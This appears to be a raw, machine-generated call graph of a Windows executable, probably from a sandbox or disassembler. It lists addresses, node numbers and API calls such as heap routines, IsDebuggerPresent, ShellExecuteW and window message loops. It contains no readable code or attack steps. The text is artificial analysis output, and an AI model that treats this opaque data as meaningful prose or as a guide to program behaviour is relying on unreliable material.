41f69e _malloc 84683->84685 84684->84685 84686 41f68f 84684->84686 84687 41f6b1 HeapAlloc 84685->84687 84690 41f6d8 84685->84690 84691 417f77 46 API calls __getptd_noexit 84686->84691 84687->84685 84687->84690 84689 41f694 84689->84677 84690->84677 84691->84689 84694 416b0d 84692->84694 84693 4135bb _malloc 45 API calls 84693->84694 84694->84693 84695 416b43 84694->84695 84696 416b24 Sleep 84694->84696 84695->84618 84697 416b39 84696->84697 84697->84694 84697->84695 84698->84627 84700 41377c __dosmaperr 84699->84700 84701 413753 RtlFreeHeap 84699->84701 84700->84628 84701->84700 84702 413768 84701->84702 84708 417f77 46 API calls __getptd_noexit 84702->84708 84704 41376e GetLastError 84704->84700 84709 417daa 84705->84709 84708->84704 84711 417dc9 __crtGetStringTypeA_stat __call_reportfault 84709->84711 84710 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84714 417eb5 __call_reportfault 84710->84714 84711->84710 84713 417ed1 GetCurrentProcess TerminateProcess 84713->84637 84715 41a208 84714->84715 84716 41a210 84715->84716 84717 41a212 IsDebuggerPresent 84715->84717 84716->84713 84723 41fe19 84717->84723 84720 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84721 421ff0 __call_reportfault 84720->84721 84722 421ff8 GetCurrentProcess TerminateProcess 84720->84722 84721->84722 84722->84713 84723->84720 84724->84641 84726 408f48 moneypunct 84725->84726 84727 4265c7 VariantClear 84726->84727 84728 408f55 moneypunct 84726->84728 84727->84728 84728->84646 84785 40ebd0 84729->84785 84789 4182cb 84732->84789 84734 41195e 84796 4181f2 LeaveCriticalSection 84734->84796 84736 40d748 84737 4119b0 84736->84737 84738 4119d6 84737->84738 84739 4119bc 84737->84739 84738->84654 84739->84738 84831 417f77 46 API calls __getptd_noexit 84739->84831 84741 4119c6 84832 417f25 10 API calls wcstoxl 84741->84832 84743 4119d1 84743->84654 84744->84656 84833 401f20 84745->84833 84747 40d5b6 IsDebuggerPresent 84748 40d5c4 84747->84748 84749 42e1bb MessageBoxA 84747->84749 84750 42e1d4 84748->84750 84751 40d5e3 84748->84751 84749->84750 85005 403a50 52 API calls 3 library calls 84750->85005 84903 40f520 84751->84903 84755 40d5fd GetFullPathNameW 84915 401460 84755->84915 84757 40d63b 84758 40d643 84757->84758 84759 42e231 SetCurrentDirectoryW 84757->84759 84760 40d64c 84758->84760 85006 432fee 6 API calls 84758->85006 84759->84758 84930 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84760->84930 84763 42e252 84763->84760 84765 42e25a GetModuleFileNameW 84763->84765 84767 42e274 84765->84767 84768 42e2cb GetForegroundWindow ShellExecuteW 84765->84768 85007 401b10 84767->85007 84771 40d688 84768->84771 84769 40d656 84770 40d669 84769->84770 84773 40e0c0 74 API calls 84769->84773 84938 4091e0 84770->84938 84777 40d692 SetCurrentDirectoryW 84771->84777 84773->84770 84777->84658 84779 42e28d 85014 40d200 52 API calls 2 library calls 84779->85014 84782 42e299 GetForegroundWindow ShellExecuteW 84783 42e2c6 84782->84783 84783->84771 84784 40ec00 LoadLibraryA GetProcAddress 84784->84649 84786 40d72e 84785->84786 84787 40ebd6 LoadLibraryA 84785->84787 84786->84649 84786->84784 84787->84786 84788 40ebe7 GetProcAddress 84787->84788 84788->84786 84790 4182e0 84789->84790 84791 4182f3 EnterCriticalSection 84789->84791 84797 418209 84790->84797 84791->84734 84793 4182e6 84793->84791 84824 411924 46 API calls 3 library calls 84793->84824 84796->84736 84798 418215 __wfsopen 84797->84798 84799 418225 84798->84799 84800 41823d 84798->84800 84825 418901 46 API calls 2 library calls 84799->84825 84803 416b04 __malloc_crt 45 API calls 84800->84803 84806 41824b __wfsopen 84800->84806 84802 41822a 84826 418752 46 API calls 9 library calls 84802->84826 84805 418256 84803->84805 84808 41825d 84805->84808 84809 41826c 84805->84809 84806->84793 84807 418231 84827 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84807->84827 84828 417f77 46 API calls __getptd_noexit 84808->84828 84810 4182cb __lock 45 API calls 84809->84810 84813 418273 84810->84813 84815 4182a6 84813->84815 84816 41827b InitializeCriticalSectionAndSpinCount 84813->84816 84819 413748 _free 45 API calls 84815->84819 84817 418297 84816->84817 84818 41828b 84816->84818 84830 4182c2 LeaveCriticalSection _doexit 84817->84830 84820 413748 _free 45 API calls 84818->84820 84819->84817 84821 418291 84820->84821 84829 417f77 46 API calls __getptd_noexit 84821->84829 84825->84802 84826->84807 84828->84806 84829->84817 84830->84806 84831->84741 84832->84743 85015 40e6e0 84833->85015 84837 401f41 GetModuleFileNameW 85033 410100 84837->85033 84839 401f5c 85045 410960 84839->85045 84842 401b10 52 API calls 84843 401f81 84842->84843 85048 401980 84843->85048 84845 401f8e 84846 408f40 VariantClear 84845->84846 84847 401f9d 84846->84847 84848 401b10 52 API calls 84847->84848 84849 401fb4 84848->84849 84850 401980 53 API calls 84849->84850 84851 401fc3 84850->84851 84852 401b10 52 API calls 84851->84852 84853 401fd2 84852->84853 85056 40c2c0 84853->85056 84855 401fe1 84856 40bc70 52 API calls 84855->84856 84857 401ff3 84856->84857 85074 401a10 84857->85074 84859 401ffe 85081 4114ab 84859->85081 84862 428b05 84864 401a10 52 API calls 84862->84864 84863 402017 84865 4114ab __wcsicoll 58 API calls 84863->84865 84866 428b18 84864->84866 84867 402022 84865->84867 84869 401a10 52 API calls 84866->84869 84867->84866 84868 40202d 84867->84868 84870 4114ab __wcsicoll 58 API calls 84868->84870 84871 428b33 84869->84871 84872 402038 84870->84872 84874 428b3b GetModuleFileNameW 84871->84874 84873 402043 84872->84873 84872->84874 84876 4114ab __wcsicoll 58 API calls 84873->84876 84875 401a10 52 API calls 84874->84875 84878 428b6c 84875->84878 84877 40204e 84876->84877 84879 402092 84877->84879 84883 401a10 52 API calls 84877->84883 84888 428b90 _wcscpy 84877->84888 84880 40e0a0 52 API calls 84878->84880 84882 4020a3 84879->84882 84879->84888 84881 428b7a 84880->84881 84884 401a10 52 API calls 84881->84884 84885 428bc6 84882->84885 85089 40e830 53 API calls 84882->85089 84886 402073 _wcscpy 84883->84886 84887 428b88 84884->84887 84893 401a10 52 API calls 84886->84893 84887->84888 84890 401a10 52 API calls 84888->84890 84898 4020d0 84890->84898 84891 4020bb 85090 40cf00 53 API calls 84891->85090 84893->84879 84894 4020c6 84895 408f40 VariantClear 84894->84895 84895->84898 84896 402110 84900 408f40 VariantClear 84896->84900 84898->84896 84901 401a10 52 API calls 84898->84901 85091 40cf00 53 API calls 84898->85091 85092 40e6a0 53 API calls 84898->85092 84902 402120 moneypunct 84900->84902 84901->84898 84902->84747 84904 4295c9 __crtGetStringTypeA_stat 84903->84904 84905 40f53c 84903->84905 84907 4295d9 GetOpenFileNameW 84904->84907 85768 410120 84905->85768 84907->84905 84909 40d5f5 84907->84909 84908 40f545 85772 4102b0 SHGetMalloc 84908->85772 84909->84755 84909->84757 84911 40f54c 85777 410190 GetFullPathNameW 84911->85777 84913 40f559 85788 40f570 84913->85788 85850 402400 84915->85850 84917 40146f 84920 428c29 _wcscat 84917->84920 85859 401500 84917->85859 84919 40147c 84919->84920 85867 40d440 84919->85867 84922 401489 84922->84920 84923 401491 GetFullPathNameW 84922->84923 84924 402160 52 API calls 84923->84924 84925 4014bb 84924->84925 84926 402160 52 API calls 84925->84926 84927 4014c8 84926->84927 84927->84920 84928 402160 52 API calls 84927->84928 84929 4014ee 84928->84929 84929->84757 84931 428361 84930->84931 84932 4103fc LoadImageW RegisterClassExW 84930->84932 85887 44395e EnumResourceNamesW LoadImageW 84931->85887 85886 410490 7 API calls 84932->85886 84935 40d651 84937 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84935->84937 84936 428368 84937->84769 84939 409202 84938->84939 84940 42d7ad 84938->84940 84999 409216 moneypunct 84939->84999 86150 410940 331 API calls 84939->86150 86153 45e737 90 API calls 3 library calls 84940->86153 84943 409386 84944 40939c 84943->84944 86151 40f190 10 API calls 84943->86151 84944->84771 85004 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 84944->85004 84946 4095b2 84946->84944 84948 4095bf 84946->84948 84947 409253 PeekMessageW 84947->84999 86152 401a50 331 API calls 84948->86152 84950 40d410 VariantClear 84950->84999 84951 42d8cd Sleep 84951->84999 84952 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84952->84944 84955 4095f9 84952->84955 84954 42e13b 86171 40d410 VariantClear 84954->86171 84958 42e158 TranslateMessage DispatchMessageW GetMessageW 84955->84958 84958->84958 84959 42e188 84958->84959 84959->84944 84961 409567 PeekMessageW 84961->84999 84963 44c29d 52 API calls 84996 4094e0 84963->84996 84964 46f3c1 107 API calls 84964->84999 84965 40e0a0 52 API calls 84965->84999 84966 46fdbf 108 API calls 84966->84996 84967 42dcd2 WaitForSingleObject 84972 42dcf0 GetExitCodeProcess CloseHandle 84967->84972 84967->84999 84968 409551 TranslateMessage DispatchMessageW 84968->84961 84970 42dd3d Sleep 84970->84996 84971 47d33e 309 API calls 84971->84999 86160 40d410 VariantClear 84972->86160 84975 4094cf Sleep 84975->84996 84976 40c620 timeGetTime 84976->84996 84979 42d94d timeGetTime 86156 465124 53 API calls 84979->86156 84983 465124 53 API calls 84983->84996 84984 42dd89 CloseHandle 84984->84996 84985 408f40 VariantClear 84985->84996 84987 42de19 GetExitCodeProcess CloseHandle 84987->84996 84990 42de88 Sleep 84990->84999 84993 45e737 90 API calls 84993->84999 84996->84963 84996->84966 84996->84976 84996->84983 84996->84984 84996->84985 84996->84987 84996->84990 84996->84999 85000 401b10 52 API calls 84996->85000 85002 401980 53 API calls 84996->85002 86157 45178a 54 API calls 84996->86157 86158 47d33e 331 API calls 84996->86158 86159 453bc6 54 API calls 84996->86159 86161 40d410 VariantClear 84996->86161 86162 443d19 67 API calls _wcslen 84996->86162 86163 4574b4 VariantClear 84996->86163 86164 403cd0 84996->86164 86168 4731e1 VariantClear 84996->86168 86169 4331a2 6 API calls 84996->86169 84997 42e0cc VariantClear 84997->84999 84998 408f40 VariantClear 84998->84999 84999->84943 84999->84947 84999->84950 84999->84951 84999->84954 84999->84961 84999->84964 84999->84965 84999->84967 84999->84968 84999->84970 84999->84971 84999->84975 84999->84979 84999->84993 84999->84996 84999->84997 84999->84998 85888 4091b0 84999->85888 85946 40afa0 84999->85946 85972 408fc0 84999->85972 86007 408cc0 84999->86007 86021 4096a0 84999->86021 86148 40d150 TranslateAcceleratorW 84999->86148 86149 40d170 IsDialogMessageW GetClassLongW 84999->86149 86154 465124 53 API calls 84999->86154 86155 40c620 timeGetTime 84999->86155 86170 40e270 VariantClear moneypunct 84999->86170 85000->84996 85002->84996 85004->84771 85005->84757 85006->84763 85008 401b16 _wcslen 85007->85008 85009 4115d7 52 API calls 85008->85009 85012 401b63 85008->85012 85010 401b4b _memmove 85009->85010 85011 4115d7 52 API calls 85010->85011 85011->85012 85013 40d200 52 API calls 2 library calls 85012->85013 85013->84779 85014->84782 85016 40bc70 52 API calls 85015->85016 85017 401f31 85016->85017 85018 402560 85017->85018 85019 40256d __write_nolock 85018->85019 85020 402160 52 API calls 85019->85020 85022 402593 85020->85022 85032 4025bd 85022->85032 85093 401c90 85022->85093 85023 4026f0 52 API calls 85023->85032 85024 4026a7 85025 401b10 52 API calls 85024->85025 85031 4026db 85024->85031 85027 4026d1 85025->85027 85026 401b10 52 API calls 85026->85032 85097 40d7c0 52 API calls 2 library calls 85027->85097 85029 401c90 52 API calls 85029->85032 85031->84837 85032->85023 85032->85024 85032->85026 85032->85029 85096 40d7c0 52 API calls 2 library calls 85032->85096 85098 40f760 85033->85098 85036 410118 85036->84839 85038 42805d 85039 42806a 85038->85039 85154 431e58 85038->85154 85040 413748 _free 46 API calls 85039->85040 85042 428078 85040->85042 85043 431e58 82 API calls 85042->85043 85044 428084 85043->85044 85044->84839 85046 4115d7 52 API calls 85045->85046 85047 401f74 85046->85047 85047->84842 85049 4019a3 85048->85049 85054 401985 85048->85054 85050 4019b8 85049->85050 85049->85054 85757 403e10 53 API calls 85050->85757 85052 40199f 85052->84845 85053 4019c4 85053->84845 85054->85052 85756 403e10 53 API calls 85054->85756 85057 40c2c7 85056->85057 85058 40c30e 85056->85058 85061 40c2d3 85057->85061 85062 426c79 85057->85062 85059 40c315 85058->85059 85060 426c2b 85058->85060 85065 40c321 85059->85065 85066 426c5a 85059->85066 85063 426c4b 85060->85063 85064 426c2e 85060->85064 85758 403ea0 52 API calls __cinit 85061->85758 85763 4534e3 52 API calls 85062->85763 85761 4534e3 52 API calls 85063->85761 85072 40c2de 85064->85072 85760 4534e3 52 API calls 85064->85760 85759 403ea0 52 API calls __cinit 85065->85759 85762 4534e3 52 API calls 85066->85762 85072->84855 85075 401a30 85074->85075 85076 401a17 85074->85076 85078 402160 52 API calls 85075->85078 85077 401a2d 85076->85077 85764 403c30 52 API calls _memmove 85076->85764 85077->84859 85080 401a3d 85078->85080 85080->84859 85082 411523 85081->85082 85083 4114ba 85081->85083 85767 4113a8 58 API calls 3 library calls 85082->85767 85087 40200c 85083->85087 85765 417f77 46 API calls __getptd_noexit 85083->85765 85086 4114c6 85766 417f25 10 API calls wcstoxl 85086->85766 85087->84862 85087->84863 85089->84891 85090->84894 85091->84898 85092->84898 85094 4026f0 52 API calls 85093->85094 85095 401c97 85094->85095 85095->85022 85096->85032 85097->85031 85158 40f6f0 85098->85158 85100 40f77b _strcat moneypunct 85166 40f850 85100->85166 85105 427c2a 85195 414d04 85105->85195 85107 40f7fc 85107->85105 85109 40f804 85107->85109 85182 414a46 85109->85182 85113 40f80e 85113->85036 85117 4528bd 85113->85117 85114 427c59 85201 414fe2 85114->85201 85116 427c79 85118 4150d1 _fseek 81 API calls 85117->85118 85119 452930 85118->85119 85698 452719 85119->85698 85122 452948 85122->85038 85123 414d04 __fread_nolock 61 API calls 85124 452966 85123->85124 85125 414d04 __fread_nolock 61 API calls 85124->85125 85126 452976 85125->85126 85127 414d04 __fread_nolock 61 API calls 85126->85127 85128 45298f 85127->85128 85129 414d04 __fread_nolock 61 API calls 85128->85129 85130 4529aa 85129->85130 85131 4150d1 _fseek 81 API calls 85130->85131 85132 4529c4 85131->85132 85133 4135bb _malloc 46 API calls 85132->85133 85134 4529cf 85133->85134 85135 4135bb _malloc 46 API calls 85134->85135 85136 4529db 85135->85136 85137 414d04 __fread_nolock 61 API calls 85136->85137 85138 4529ec 85137->85138 85139 44afef GetSystemTimeAsFileTime 85138->85139 85140 452a00 85139->85140 85141 452a36 85140->85141 85142 452a13 85140->85142 85143 452aa5 85141->85143 85144 452a3c 85141->85144 85145 413748 _free 46 API calls 85142->85145 85147 413748 _free 46 API calls 85143->85147 85704 44b1a9 85144->85704 85148 452a1c 85145->85148 85150 452aa3 85147->85150 85151 413748 _free 46 API calls 85148->85151 85149 452a9d 85153 413748 _free 46 API calls 85149->85153 85150->85038 85152 452a25 85151->85152 85152->85038 85153->85150 85155 431e64 85154->85155 85156 431e6a 85154->85156 85157 414a46 __fcloseall 82 API calls 85155->85157 85156->85039 85157->85156 85159 425de2 85158->85159 85161 40f6fc _wcslen 85158->85161 85159->85100 85160 40f710 WideCharToMultiByte 85162 40f756 85160->85162 85163 40f728 85160->85163 85161->85160 85162->85100 85164 4115d7 52 API calls 85163->85164 85165 40f735 WideCharToMultiByte 85164->85165 85165->85100 85167 40f85d __crtGetStringTypeA_stat _strlen 85166->85167 85169 40f7ab 85167->85169 85214 414db8 85167->85214 85170 4149c2 85169->85170 85226 414904 85170->85226 85172 40f7e9 85172->85105 85173 40f5c0 85172->85173 85174 40f5cd _strcat __write_nolock _memmove 85173->85174 85175 414d04 __fread_nolock 61 API calls 85174->85175 85176 40f691 __tzset_nolock 85174->85176 85178 425d11 85174->85178 85314 4150d1 85174->85314 85175->85174 85176->85107 85179 4150d1 _fseek 81 API calls 85178->85179 85180 425d33 85179->85180 85181 414d04 __fread_nolock 61 API calls 85180->85181 85181->85176 85183 414a52 __wfsopen 85182->85183 85184 414a64 85183->85184 85185 414a79 85183->85185 85454 417f77 46 API calls __getptd_noexit 85184->85454 85187 415471 __lock_file 47 API calls 85185->85187 85191 414a74 __wfsopen 85185->85191 85189 414a92 85187->85189 85188 414a69 85455 417f25 10 API calls wcstoxl 85188->85455 85438 4149d9 85189->85438 85191->85113 85523 414c76 85195->85523 85197 414d1c 85198 44afef 85197->85198 85691 442c5a 85198->85691 85200 44b00d 85200->85114 85202 414fee __wfsopen 85201->85202 85203 414ffa 85202->85203 85204 41500f 85202->85204 85695 417f77 46 API calls __getptd_noexit 85203->85695 85206 415471 __lock_file 47 API calls 85204->85206 85208 415017 85206->85208 85207 414fff 85696 417f25 10 API calls wcstoxl 85207->85696 85210 414e4e __ftell_nolock 51 API calls 85208->85210 85211 415024 85210->85211 85697 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85211->85697 85213 41500a __wfsopen 85213->85116 85215 414dd6 85214->85215 85216 414deb 85214->85216 85223 417f77 46 API calls __getptd_noexit 85215->85223 85216->85215 85221 414df2 85216->85221 85218 414ddb 85224 417f25 10 API calls wcstoxl 85218->85224 85220 414de6 85220->85167 85221->85220 85225 418f98 77 API calls 6 library calls 85221->85225 85223->85218 85224->85220 85225->85220 85227 414910 __wfsopen 85226->85227 85228 414923 85227->85228 85231 414951 85227->85231 85282 417f77 46 API calls __getptd_noexit 85228->85282 85230 414928 85283 417f25 10 API calls wcstoxl 85230->85283 85245 41d4d1 85231->85245 85234 414956 85235 41496a 85234->85235 85236 41495d 85234->85236 85238 414992 85235->85238 85239 414972 85235->85239 85284 417f77 46 API calls __getptd_noexit 85236->85284 85262 41d218 85238->85262 85285 417f77 46 API calls __getptd_noexit 85239->85285 85242 414933 __wfsopen @_EH4_CallFilterFunc@8 85242->85172 85246 41d4dd __wfsopen 85245->85246 85247 4182cb __lock 46 API calls 85246->85247 85260 41d4eb 85247->85260 85248 41d560 85287 41d5fb 85248->85287 85249 41d567 85251 416b04 __malloc_crt 46 API calls 85249->85251 85252 41d56e 85251->85252 85252->85248 85254 41d57c InitializeCriticalSectionAndSpinCount 85252->85254 85253 41d5f0 __wfsopen 85253->85234 85255 41d59c 85254->85255 85256 41d5af EnterCriticalSection 85254->85256 85259 413748 _free 46 API calls 85255->85259 85256->85248 85257 418209 __mtinitlocknum 46 API calls 85257->85260 85259->85248 85260->85248 85260->85249 85260->85257 85290 4154b2 47 API calls __lock 85260->85290 85291 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85260->85291 85263 41d23a 85262->85263 85264 41d255 85263->85264 85275 41d26c __wopenfile 85263->85275 85296 417f77 46 API calls __getptd_noexit 85264->85296 85266 41d25a 85297 417f25 10 API calls wcstoxl 85266->85297 85267 41d47a 85301 417f77 46 API calls __getptd_noexit 85267->85301 85268 41d48c 85293 422bf9 85268->85293 85272 41d47f 85302 417f25 10 API calls wcstoxl 85272->85302 85273 41499d 85286 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85273->85286 85275->85267 85281 41d421 85275->85281 85298 41341f 58 API calls 2 library calls 85275->85298 85277 41d41a 85277->85281 85299 41341f 58 API calls 2 library calls 85277->85299 85279 41d439 85279->85281 85300 41341f 58 API calls 2 library calls 85279->85300 85281->85267 85281->85268 85282->85230 85283->85242 85284->85242 85285->85242 85286->85242 85292 4181f2 LeaveCriticalSection 85287->85292 85289 41d602 85289->85253 85290->85260 85291->85260 85292->85289 85303 422b35 85293->85303 85295 422c14 85295->85273 85296->85266 85297->85273 85298->85277 85299->85279 85300->85281 85301->85272 85302->85273 85305 422b41 __wfsopen 85303->85305 85304 422b54 85306 417f77 wcstoxl 46 API calls 85304->85306 85305->85304 85307 422b8a 85305->85307 85308 422b59 85306->85308 85309 422400 __tsopen_nolock 109 API calls 85307->85309 85310 417f25 wcstoxl 10 API calls 85308->85310 85311 422ba4 85309->85311 85313 422b63 __wfsopen 85310->85313 85312 422bcb __wsopen_helper LeaveCriticalSection 85311->85312 85312->85313 85313->85295 85316 4150dd __wfsopen 85314->85316 85315 4150e9 85345 417f77 46 API calls __getptd_noexit 85315->85345 85316->85315 85317 41510f 85316->85317 85327 415471 85317->85327 85320 4150ee 85346 417f25 10 API calls wcstoxl 85320->85346 85326 4150f9 __wfsopen 85326->85174 85328 415483 85327->85328 85329 4154a5 EnterCriticalSection 85327->85329 85328->85329 85330 41548b 85328->85330 85331 415117 85329->85331 85332 4182cb __lock 46 API calls 85330->85332 85333 415047 85331->85333 85332->85331 85334 415067 85333->85334 85335 415057 85333->85335 85340 415079 85334->85340 85348 414e4e 85334->85348 85403 417f77 46 API calls __getptd_noexit 85335->85403 85339 41505c 85347 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85339->85347 85365 41443c 85340->85365 85343 4150b9 85378 41e1f4 85343->85378 85345->85320 85346->85326 85347->85326 85349 414e61 85348->85349 85350 414e79 85348->85350 85404 417f77 46 API calls __getptd_noexit 85349->85404 85351 414139 __filbuf 46 API calls 85350->85351 85353 414e80 85351->85353 85356 41e1f4 __write 51 API calls 85353->85356 85354 414e66 85405 417f25 10 API calls wcstoxl 85354->85405 85357 414e97 85356->85357 85358 414f09 85357->85358 85360 414ec9 85357->85360 85364 414e71 85357->85364 85406 417f77 46 API calls __getptd_noexit 85358->85406 85361 41e1f4 __write 51 API calls 85360->85361 85360->85364 85362 414f64 85361->85362 85363 41e1f4 __write 51 API calls 85362->85363 85362->85364 85363->85364 85364->85340 85366 414477 85365->85366 85367 414455 85365->85367 85371 414139 85366->85371 85367->85366 85368 414139 __filbuf 46 API calls 85367->85368 85369 414470 85368->85369 85407 41b7b2 77 API calls 6 library calls 85369->85407 85372 414145 85371->85372 85373 41415a 85371->85373 85408 417f77 46 API calls __getptd_noexit 85372->85408 85373->85343 85375 41414a 85409 417f25 10 API calls wcstoxl 85375->85409 85377 414155 85377->85343 85379 41e200 __wfsopen 85378->85379 85380 41e223 85379->85380 85381 41e208 85379->85381 85383 41e22f 85380->85383 85387 41e269 85380->85387 85430 417f8a 46 API calls __getptd_noexit 85381->85430 85432 417f8a 46 API calls __getptd_noexit 85383->85432 85384 41e20d 85431 417f77 46 API calls __getptd_noexit 85384->85431 85386 41e234 85433 417f77 46 API calls __getptd_noexit 85386->85433 85410 41ae56 85387->85410 85391 41e215 __wfsopen 85391->85339 85392 41e23c 85434 417f25 10 API calls wcstoxl 85392->85434 85393 41e26f 85395 41e291 85393->85395 85396 41e27d 85393->85396 85435 417f77 46 API calls __getptd_noexit 85395->85435 85420 41e17f 85396->85420 85399 41e289 85437 41e2c0 LeaveCriticalSection __unlock_fhandle 85399->85437 85400 41e296 85436 417f8a 46 API calls __getptd_noexit 85400->85436 85403->85339 85404->85354 85405->85364 85406->85364 85407->85366 85408->85375 85409->85377 85411 41ae62 __wfsopen 85410->85411 85412 41aebc 85411->85412 85413 4182cb __lock 46 API calls 85411->85413 85414 41aec1 EnterCriticalSection 85412->85414 85415 41aede __wfsopen 85412->85415 85416 41ae8e 85413->85416 85414->85415 85415->85393 85417 41aeaa 85416->85417 85418 41ae97 InitializeCriticalSectionAndSpinCount 85416->85418 85419 41aeec ___lock_fhandle LeaveCriticalSection 85417->85419 85418->85417 85419->85412 85421 41aded __lseeki64_nolock 46 API calls 85420->85421 85422 41e18e 85421->85422 85423 41e1a4 SetFilePointer 85422->85423 85424 41e194 85422->85424 85426 41e1bb GetLastError 85423->85426 85427 41e1c3 85423->85427 85425 417f77 wcstoxl 46 API calls 85424->85425 85428 41e199 85425->85428 85426->85427 85427->85428 85429 417f9d __dosmaperr 46 API calls 85427->85429 85428->85399 85429->85428 85430->85384 85431->85391 85432->85386 85433->85392 85434->85391 85435->85400 85436->85399 85437->85391 85439 4149ea 85438->85439 85440 4149fe 85438->85440 85484 417f77 46 API calls __getptd_noexit 85439->85484 85443 41443c __flush 77 API calls 85440->85443 85446 4149fa 85440->85446 85442 4149ef 85485 417f25 10 API calls wcstoxl 85442->85485 85445 414a0a 85443->85445 85457 41d8c2 85445->85457 85456 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85446->85456 85449 414139 __filbuf 46 API calls 85450 414a18 85449->85450 85461 41d7fe 85450->85461 85452 414a1e 85452->85446 85453 413748 _free 46 API calls 85452->85453 85453->85446 85454->85188 85455->85191 85456->85191 85458 414a12 85457->85458 85459 41d8d2 85457->85459 85458->85449 85459->85458 85460 413748 _free 46 API calls 85459->85460 85460->85458 85462 41d80a __wfsopen 85461->85462 85463 41d812 85462->85463 85464 41d82d 85462->85464 85501 417f8a 46 API calls __getptd_noexit 85463->85501 85465 41d839 85464->85465 85470 41d873 85464->85470 85503 417f8a 46 API calls __getptd_noexit 85465->85503 85468 41d817 85502 417f77 46 API calls __getptd_noexit 85468->85502 85469 41d83e 85504 417f77 46 API calls __getptd_noexit 85469->85504 85473 41ae56 ___lock_fhandle 48 API calls 85470->85473 85475 41d879 85473->85475 85474 41d846 85505 417f25 10 API calls wcstoxl 85474->85505 85477 41d893 85475->85477 85478 41d887 85475->85478 85506 417f77 46 API calls __getptd_noexit 85477->85506 85486 41d762 85478->85486 85480 41d81f __wfsopen 85480->85452 85482 41d88d 85507 41d8ba LeaveCriticalSection __unlock_fhandle 85482->85507 85484->85442 85485->85446 85508 41aded 85486->85508 85488 41d7c8 85521 41ad67 47 API calls 2 library calls 85488->85521 85490 41d772 85490->85488 85491 41d7a6 85490->85491 85493 41aded __lseeki64_nolock 46 API calls 85490->85493 85491->85488 85494 41aded __lseeki64_nolock 46 API calls 85491->85494 85492 41d7d0 85495 41d7f2 85492->85495 85522 417f9d 46 API calls 3 library calls 85492->85522 85496 41d79d 85493->85496 85497 41d7b2 CloseHandle 85494->85497 85495->85482 85499 41aded __lseeki64_nolock 46 API calls 85496->85499 85497->85488 85500 41d7be GetLastError 85497->85500 85499->85491 85500->85488 85501->85468 85502->85480 85503->85469 85504->85474 85505->85480 85506->85482 85507->85480 85509 41adfa 85508->85509 85513 41ae12 85508->85513 85510 417f8a __read_nolock 46 API calls 85509->85510 85512 41adff 85510->85512 85511 417f8a __read_nolock 46 API calls 85514 41ae23 85511->85514 85516 417f77 wcstoxl 46 API calls 85512->85516 85513->85511 85515 41ae51 85513->85515 85517 417f77 wcstoxl 46 API calls 85514->85517 85515->85490 85518 41ae07 85516->85518 85519 41ae2b 85517->85519 85518->85490 85520 417f25 wcstoxl 10 API calls 85519->85520 85520->85518 85521->85492 85522->85495 85524 414c82 __wfsopen 85523->85524 85525 414cc3 85524->85525 85526 414c96 __crtGetStringTypeA_stat 85524->85526 85527 414cbb __wfsopen 85524->85527 85528 415471 __lock_file 47 API calls 85525->85528 85550 417f77 46 API calls __getptd_noexit 85526->85550 85527->85197 85530 414ccb 85528->85530 85536 414aba 85530->85536 85531 414cb0 85551 417f25 10 API calls wcstoxl 85531->85551 85537 414af2 85536->85537 85541 414ad8 __crtGetStringTypeA_stat 85536->85541 85552 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85537->85552 85538 414ae2 85603 417f77 46 API calls __getptd_noexit 85538->85603 85540 414ae7 85604 417f25 10 API calls wcstoxl 85540->85604 85541->85537 85541->85538 85547 414b2d 85541->85547 85544 414c38 __crtGetStringTypeA_stat 85606 417f77 46 API calls __getptd_noexit 85544->85606 85546 414139 __filbuf 46 API calls 85546->85547 85547->85537 85547->85544 85547->85546 85553 41dfcc 85547->85553 85583 41d8f3 85547->85583 85605 41e0c2 46 API calls 3 library calls 85547->85605 85550->85531 85551->85527 85552->85527 85554 41dfd8 __wfsopen 85553->85554 85555 41dfe0 85554->85555 85556 41dffb 85554->85556 85676 417f8a 46 API calls __getptd_noexit 85555->85676 85558 41e007 85556->85558 85562 41e041 85556->85562 85678 417f8a 46 API calls __getptd_noexit 85558->85678 85559 41dfe5 85677 417f77 46 API calls __getptd_noexit 85559->85677 85561 41e00c 85679 417f77 46 API calls __getptd_noexit 85561->85679 85565 41e063 85562->85565 85566 41e04e 85562->85566 85568 41ae56 ___lock_fhandle 48 API calls 85565->85568 85681 417f8a 46 API calls __getptd_noexit 85566->85681 85570 41e069 85568->85570 85569 41e053 85682 417f77 46 API calls __getptd_noexit 85569->85682 85571 41e077 85570->85571 85572 41e08b 85570->85572 85607 41da15 85571->85607 85683 417f77 46 API calls __getptd_noexit 85572->85683 85577 41e014 85680 417f25 10 API calls wcstoxl 85577->85680 85578 41e083 85685 41e0ba LeaveCriticalSection __unlock_fhandle 85578->85685 85579 41e090 85684 417f8a 46 API calls __getptd_noexit 85579->85684 85582 41dfed __wfsopen 85582->85547 85584 41d900 85583->85584 85587 41d915 85583->85587 85689 417f77 46 API calls __getptd_noexit 85584->85689 85586 41d905 85690 417f25 10 API calls wcstoxl 85586->85690 85589 41d94a 85587->85589 85594 41d910 85587->85594 85686 420603 85587->85686 85591 414139 __filbuf 46 API calls 85589->85591 85592 41d95e 85591->85592 85593 41dfcc __read 59 API calls 85592->85593 85595 41d965 85593->85595 85594->85547 85595->85594 85596 414139 __filbuf 46 API calls 85595->85596 85597 41d988 85596->85597 85597->85594 85598 414139 __filbuf 46 API calls 85597->85598 85599 41d994 85598->85599 85599->85594 85600 414139 __filbuf 46 API calls 85599->85600 85601 41d9a1 85600->85601 85602 414139 __filbuf 46 API calls 85601->85602 85602->85594 85603->85540 85604->85537 85605->85547 85606->85540 85608 41da31 85607->85608 85609 41da4c 85607->85609 85610 417f8a __read_nolock 46 API calls 85608->85610 85611 41da5b 85609->85611 85613 41da7a 85609->85613 85612 41da36 85610->85612 85614 417f8a __read_nolock 46 API calls 85611->85614 85616 417f77 wcstoxl 46 API calls 85612->85616 85615 41da98 85613->85615 85630 41daac 85613->85630 85617 41da60 85614->85617 85619 417f8a 